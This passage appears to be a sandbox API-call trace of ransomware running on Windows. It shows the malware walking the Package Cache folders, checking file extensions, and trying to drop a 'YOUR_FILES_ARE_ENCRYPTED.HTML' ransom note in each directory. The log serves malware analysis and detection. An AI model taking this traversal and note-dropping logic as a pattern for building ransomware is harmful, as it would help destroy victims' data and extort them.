Size=0x3c00) returned 0x3183de0 [0110.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.545] GetProcessHeap () returned 0x600000 [0110.545] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.545] GetProcessHeap () returned 0x600000 [0110.545] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.545] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02cc769, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02cc769, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02d0247, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.545] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02cc769, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02cc769, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02d0247, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.546] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.546] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.546] GetProcessHeap () returned 0x600000 [0110.546] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.546] GetProcessHeap () returned 0x600000 [0110.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.546] GetProcessHeap () returned 0x600000 [0110.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.547] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f2d0b1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0110.547] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.547] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 75 [0110.547] GetProcessHeap () returned 0x600000 [0110.547] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.548] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0110.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*" [0110.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb02dc561, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.549] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb02dc561, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.549] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xa0211772, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x272, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0110.549] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.549] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 85 [0110.549] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.549] lstrlenW (lpString=".rsm") returned 4 [0110.549] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.549] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x39d18a7e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0110.549] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.549] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 92 [0110.549] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0110.549] lstrlenW (lpString=".exe") returned 4 [0110.549] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0110.549] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02d8ac5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02d8ac5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02e0075, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.549] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02d8ac5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02d8ac5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02e0075, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.549] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.549] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.549] GetProcessHeap () returned 0x600000 [0110.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.550] GetProcessHeap () returned 0x600000 [0110.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.550] GetProcessHeap () returned 0x600000 [0110.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.551] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f79386, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0110.551] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.551] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 86 [0110.551] GetProcessHeap () returned 0x600000 [0110.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.552] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0110.552] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*" [0110.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f79386, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb041c340, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.552] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f79386, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb041c340, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.552] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.552] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.552] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 95 [0110.552] GetProcessHeap () returned 0x600000 [0110.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.553] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0110.553] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*" [0110.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb040ff29, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46d6, dwReserved1=0x6f4628, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.553] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb040ff29, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46d6, dwReserved1=0x6f4628, cFileName="..", cAlternateFileName="")) returned 1 [0110.553] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb03c57f5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb03c57f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46d6, dwReserved1=0x6f4628, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0110.553] StrStrIW (lpFirst="vcRuntimeMinimum_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.553] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 118 [0110.553] GetProcessHeap () returned 0x600000 [0110.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.554] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0110.554] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*" [0110.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb03c57f5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb03c57f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63a8f8, dwReserved1=0x6f4630, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.555] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb03c57f5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb03c57f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63a8f8, dwReserved1=0x6f4630, cFileName="..", cAlternateFileName="")) returned 1 [0110.555] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681d000, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0x681d000, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb0402be2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xc5b25, dwReserved0=0x63a8f8, dwReserved1=0x6f4630, cFileName="cab1.cab.40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E", cAlternateFileName="CAB1CA~1.40A")) returned 1 [0110.555] StrStrIW (lpFirst="cab1.cab.40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.555] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E") returned 192 [0110.555] PathFindExtensionW (pszPath="cab1.cab.40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E") returned=".40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E" [0110.555] lstrlenW (lpString=".40ADE269CD14F5566B1DB6A7DABE010FC0A121E8DF896BE75978ED36B4809F0E") returned 65 [0110.555] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca02a400, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xca02a400, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xca02a400, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63a8f8, dwReserved1=0x6f4630, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.555] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.555] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 144 [0110.555] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0110.555] lstrlenW (lpString=".msi") returned 4 [0110.555] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0110.555] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02f8689, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02f8689, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04089f7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63a8f8, dwReserved1=0x6f4630, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.555] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02f8689, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02f8689, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04089f7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63a8f8, dwReserved1=0x6f4630, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.555] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.555] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0110.555] GetProcessHeap () returned 0x600000 [0110.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.556] GetProcessHeap () returned 0x600000 